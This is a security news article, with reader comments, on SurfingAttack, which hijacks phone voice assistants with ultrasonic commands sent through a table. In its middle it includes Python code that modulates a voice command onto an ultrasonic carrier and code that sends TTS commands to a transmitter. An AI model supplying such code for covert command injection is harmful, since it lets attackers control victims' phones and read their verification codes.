Naked Security

Siri and Google Assistant hacked in new ultrasonic attack

Researchers have demonstrated how voice assistants can be secretly activated without ever physically touching the device.

Unsettling news for anyone who relies on smartphone voice assistants: researchers have demonstrated how these can be secretly activated to make phone calls, take photos, and even read back text messages without ever physically touching the device.
Dubbed SurfingAttack by a US-Chinese university team, this is no parlor trick and is based on the ability to remotely control voice assistants using inaudible ultrasonic waves.
Voice assistants – the demo targeted Siri, Google Assistant, and Bixby – are designed to respond to the owner’s voice after hearing a trigger phrase such as ‘Ok, Google’.
Ultimately, commands are just sound waves, which other researchers have already shown can be emulated using ultrasonic waves that humans can’t hear, provided the attacker has line of sight to the device and the distance is short.
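The underlying trick, demonstrated by earlier work such as DolphinAttack, is to amplitude-modulate the audible command onto an ultrasonic carrier; non-linearities in the phone’s microphone circuitry then demodulate it back into the audible band. Here’s a minimal sketch of that idea (the carrier frequency, modulation depth and file names below are illustrative assumptions, not the SurfingAttack researchers’ actual parameters):

```python
# Illustrative sketch only: amplitude-modulate an audible voice command onto
# an ultrasonic carrier so that it is inaudible in the air, yet can be
# demodulated back into the audible band by the microphone's non-linearity.
# Carrier frequency, modulation depth and file names are assumptions.
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000     # assumed carrier, comfortably above human hearing
OUT_RATE = 192_000      # high sample rate needed to represent the carrier

rate, voice = wavfile.read("ok_google_command.wav")    # hypothetical recording
if voice.ndim > 1:
    voice = voice[:, 0]                                # keep one channel
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))                         # normalise to [-1, 1]

# Resample the baseband command to the output rate (simple linear interpolation).
t_old = np.arange(len(voice)) / rate
t_new = np.arange(0, t_old[-1], 1.0 / OUT_RATE)
baseband = np.interp(t_new, t_old, voice)

# Classic AM: (1 + m * signal) * carrier, with modulation depth m = 0.8.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_new)
modulated = (1.0 + 0.8 * baseband) * carrier
modulated /= np.max(np.abs(modulated))                 # avoid int16 clipping

wavfile.write("ultrasonic_payload.wav", OUT_RATE, (modulated * 32767).astype(np.int16))
```

Played through an ultrasonic transducer – or, in SurfingAttack’s case, a piezoelectric disc coupled to a table – the result is inaudible to humans but still registers as a voice command on the phone.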
What SurfingAttack adds to this is the ability to send the ultrasonic commands through the solid glass or wooden table on which the smartphone is sitting, using a circular piezoelectric disc attached to the table’s underside.
Although the distance was only 43cm (17 inches), hiding the disc under a surface represents a more plausible, easier-to-conceal attack method than previous techniques.
As explained in a video showcasing the method, a remote laptop uses a text-to-speech (TTS) module to generate simulated voice commands, which are then transmitted to the disc over Wi-Fi or Bluetooth.
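A purely illustrative sketch of that laptop-side chain (not the researchers’ actual tooling) might look like the snippet below, with a hypothetical transmitter address standing in for whatever device drives the piezoelectric disc:

```python
# Hypothetical attacker-side sender: synthesise the command with an
# off-the-shelf TTS engine, then ship the audio to the transmitter host over
# a plain TCP socket. Address, port and command text are made-up examples.
import socket
import pyttsx3

TRANSMITTER_ADDR = ("192.168.1.50", 9000)   # assumed host driving the piezo disc

engine = pyttsx3.init()
engine.save_to_file("OK Google, read my messages", "command.wav")
engine.runAndWait()                          # blocks until the WAV file is written

with open("command.wav", "rb") as f, socket.create_connection(TRANSMITTER_ADDR) as sock:
    sock.sendall(f.read())                   # receiver would modulate and play the audio
```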
The researchers tested the method on 17 different smartphone models from Apple, Google, Samsung, Motorola, Xiaomi, and Huawei, successfully deploying SurfingAttack against 15 of them.
The researchers were able to activate the voice assistants, commanding them to unlock devices, take repeated selfies, make fraudulent calls, and even read out a user’s text messages, including SMS verification codes.
Responses were recorded using a concealed microphone after turning down the device’s volume so this communication would not be heard by a nearby user in an office setting.

DolphinAttack rides again

In theory, voice assistants should only respond to the owner’s voice, but voices can now be cloned using machine learning software such as Lyrebird, as was the case in this test. It’s a defence of sorts, then: the attacker still needs to capture and clone the victim’s voice.
A bigger defence might simply be the design of individual smartphones: the team believes the two handsets that resisted SurfingAttack, Huawei’s Mate 9 and Samsung’s Galaxy Note 10, did so because the materials from which they were constructed dampened the ultrasonic waves. According to the researchers, putting the smartphone on a tablecloth was better still.
SurfingAttack was inspired by the 2017 DolphinAttack proof-of-concept, which showed how voice assistants could be hijacked by ultrasonic commands.
Elsewhere, sound has also proved interesting to researchers looking to jump air gaps and exfiltrate data via computer fan noise.
While hacking voice assistants remains a lab activity with no known real-world attacks to speak of, there’s always a risk that this could change. At some point, smartphone makers will surely have to come up with better countermeasures.



9 Comments

This might seem simplistic but couldn’t these devices be configured to only respond to voices within the normal 85-255 Hz range?


“According to the researchers, putting the smartphone on a tablecloth was better still.” So would it not be too wild a guess to assume that the silicone case that Apple makes for the iPhone would blanket the sound?


Still a defence (though not a cure-all)
Maybe it should be easier to rename the activation phrase, so that the default “Hey Google” or “Ok Siri” or “Alexa” becomes “Garniwutz” (or another name like “Garfield-seventy four” that the user chooses). Then, not only would potential attackers need to capture the real voice of the owner, they would also need the real activation phrase.


Google have removed voice unlock now.


Correct – but every time someone unlocks their phone (which most people in offices will do regularly), they become vulnerable until it locks again, possibly minutes later.


Have you seen the Smarter Every Day video on YouTube where they use a laser to send commands through a window to a Google Home, an Amazon Echo, and even Android phones and iPhones? Pretty crazy to see how it all works. Moral of the story: don’t leave your voice assistants’ microphones in view of a window.


Annoying as it is, I mute my smart home devices. Until security improves or privacy actually means what it implies, I go through the extra work of pushing the button. The next real question is: “Is the button really muting?” :-\

